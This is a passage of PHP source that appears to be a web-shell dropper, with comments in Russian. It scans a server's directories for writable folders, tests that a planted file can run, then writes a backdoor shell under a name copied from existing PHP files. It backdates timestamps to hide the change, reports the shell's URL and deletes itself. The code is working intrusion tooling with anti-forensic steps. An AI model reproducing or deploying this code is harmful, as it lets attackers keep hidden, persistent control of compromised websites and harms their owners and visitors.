$root_dir) $result[$root_name] = scan($root_dir); if(count($result) > 0) foreach($result as $info) { if(!isset($info['dir']) || count(@$info['dir']) == 0) continue; if(!isset($info['file']) || count(@$info['file']) == 0) continue; $info['dir'] = array_unique($info['dir']); shuffle($info['dir']); if($try_random == '1') { $info['file'] = array_unique($info['file']); shuffle($info['file']); } else $info['file'] = array($default_filename); foreach($info['dir'] as $random_dir) { foreach($info['file'] as $random_file) { if(count($info['dir']) == 1 && $try_random == '1') { $suffix = array('_', '.old', '_old', 'old', 'bak', '.bak', '_bak', '1', '2', '3', '_1', '_2', '_3', '.1', '.2', '.3'); shuffle($suffix); $replace = $suffix[0].'.php'; $random_file = preg_replace('/\.php$/i', $replace, $random_file); } $random_path = $random_dir.DIRECTORY_SEPARATOR.'t_s_'.$random_file; if(!is_file($random_dir.DIRECTORY_SEPARATOR.$random_file)) { if(is_writable($random_dir)) { $dir_time = filemtime($random_dir); if($handle = opendir($random_dir)) { $old_time = microtime(1); while (false !== ($file = readdir($handle))) { if($file == "." or $file == "..") continue; $filemt = filemtime($random_dir.DIRECTORY_SEPARATOR.$file); if($filemt < $old_time) $old_time = $filemt; } $old_time = ($dir_time < $old_time) ? $dir_time : $old_time; $test_str = ''; if(file_put_contents($random_path, $test_str)) { $url = $host.str_replace('\\','/',str_replace($homedir,'',$random_path)); if($content = get($url)) { if(preg_match('/'.md5(23).'/', $content)) { unlink($random_path); $random_path = str_replace('t_s_', '', $random_path); if(file_put_contents($random_path, $shell)) { chmod($random_path, 0755); touch($random_path, $old_time); touch($random_dir, $dir_time); endik(str_replace('/t_s_', '/', $url)); } else endik('re_error_write'); } } if(file_exists($random_path)) { unlink($random_path); touch($random_dir, $dir_time); } } } } break(1); } } } } } if(is_writable(dirname($_SERVER['SCRIPT_FILENAME']))) // Попытка два { $old_time = (filemtime("./") < filemtime("../")) ? filemtime("./") : filemtime("../"); $file = dirname($_SERVER['SCRIPT_FILENAME']).DIRECTORY_SEPARATOR.$default_filename; if(file_put_contents($file, $shell)) { touch($file, $old_time); $url_path = str_replace('//', '/', dirname($_SERVER['PHP_SELF']).DIRECTORY_SEPARATOR.$default_filename); endik($host.$url_path); } else endik('re_error_write'); }else endik('re_error_right'); // Функции function scan($homedir, $count=0, $files=array()) { $scan_max = 2; $subdir = array(); if($count > $scan_max) return $files; if($handle = opendir($homedir)) { $files['dir'][] = $homedir; while(false !== ($file = readdir($handle))) { if($file == "." or $file == "..") continue; $fullPath = $homedir.DIRECTORY_SEPARATOR.$file; if(filetype($fullPath) == "dir") { $files['dir'][] = $fullPath; $subdir[] = $fullPath; } elseif(!preg_match('#(index\.php|admin\.php)#', $file) and preg_match('/\.php$/i', $file)) $files['file'][] = $file; } ++$count; if(count($subdir) > 0) foreach($subdir as $dir) $files = scan($dir, $count, $files); } return $files; } function get($url) { if(is_callable("curl_exec")) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0'); curl_setopt($ch, CURLOPT_HEADER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); $content = curl_exec($ch); curl_close($ch); return $content; } elseif(is_callable("file_get_contents") && filter_var(ini_get('allow_url_fopen'), FILTER_VALIDATE_BOOLEAN)) { return file_get_contents($url, false, stream_context_create(array( "ssl" => array("verify_host" => false, "verify_peer" => false, "verify_peer_name" => false, "allow_self_signed" => true ), "http" => array( "header" => "User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0" ) ))); } elseif(is_callable("fsockopen")) { if($fp = fsockopen(parse_url($url, PHP_URL_HOST), 80, $e, $e, 15)) { $out ="GET ".parse_url($url, PHP_URL_PATH)." HTTP/1.1\r\n"; $out.="Host: ".parse_url($url, PHP_URL_HOST)."\r\n"; $out.="User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:38.0) Gecko/20100101 Firefox/38.0\r\n"; $out.="\r\n"; fputs($fp, $out); $content = ''; while(!feof($fp)) { $content .= fgets($fp, 1024); } fclose($fp); return $content; } else return false; } else return false; } function endik($msg) { @unlink(__FILE__); $result = ''.$msg.''; die($result); } ?>